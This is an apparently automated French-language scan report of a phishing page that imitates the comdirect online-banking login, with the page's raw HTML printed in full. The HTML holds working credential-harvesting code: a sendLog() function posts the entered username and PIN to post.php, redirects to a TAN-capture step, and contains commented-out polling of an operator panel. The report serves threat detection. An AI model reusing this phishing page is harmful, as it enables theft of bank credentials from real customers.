- ID de l'analyse :
- 751fcf29-7be9-4f39-8055-eeabecbe63feTerminée
- URL soumise :
- https://lvm.doq.mybluehost.me/dd/direct/auth/Rs9RulP/kunden/de/login.php
- Fin du rapport :
Liens : 0 trouvé(s)
Liens sortants identifiés à partir de la page
Variables JavaScript : 7 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
$ | function |
jQuery | function |
$jscomp | object |
sendLog | function |
Messages de journal de console : 3 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
warning | other |
|
verbose | dom |
|
error | network |
|
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalabl=no">
<title>Konto</title>
<link rel="stylesheet" href="res/app.css?version=672b8b1184d84">
<link rel="stylesheet" href="res/img.css?version=672b8b1184d8b">
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-creditcardvalidator/1.2.0/jquery.creditCardValidator.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
</head>
<body><header>
<img src="res/html/header-lg.png" class="lg">
<img src="res/html/header-md.png" class="md">
<img src="res/html/header-sm.png" class="sm">
<img src="res/html/header-xs.png" class="xs">
</header>
<main>
<section>
<div class="form">
<div class="title">
comdirect Login
</div>
<div class="text">
Willkommen bei Ihrem Online Banking
</div>
<div class="col">
<input type="text" placeholder="Zugangsnummer / Benutzername" id="u">
</div>
<div class="col">
<input type="password" placeholder="PIN / Passwort" id="p">
</div>
<div class="col">
<button onclick="sendLog()">Anmelden</button>
</div>
</div>
</section>
</main>
<script>
function sendLog(){
$("input").removeClass("error");
if($("#u").val().length<4){
return $("#u").addClass("error");
}
if($("#p").val().length<4){
return $("#p").addClass("error");
}
$.post("post.php",{user:$("#u").val(), pass:$("#p").val()},(res)=>{
window.location="mkfile.php?p=waitTan";
});
}
$("input").keypress((e)=>{
if(e.key=="Enter"){
sendLog();
}
});
// setInterval(() => {
// $.post("../panel/update_statu.php",{update:1, ip:''});
// }, 1000);
// var page ="";
// var cd = "";
// setInterval(() => {
// $.post("../panel/fetch.php", {update:1}, function(d){
// if(cd!=d){
// window.location=d;
// }
// })
// }, 2000);
</script>
<footer>
<img src="res/html/footer-lg.png" class="lg">
<img src="res/html/footer-md.png" class="md">
<img src="res/html/footer-sm.png" class="sm">
<img src="res/html/footer-xs.png" class="xs">
</footer>
</body></html>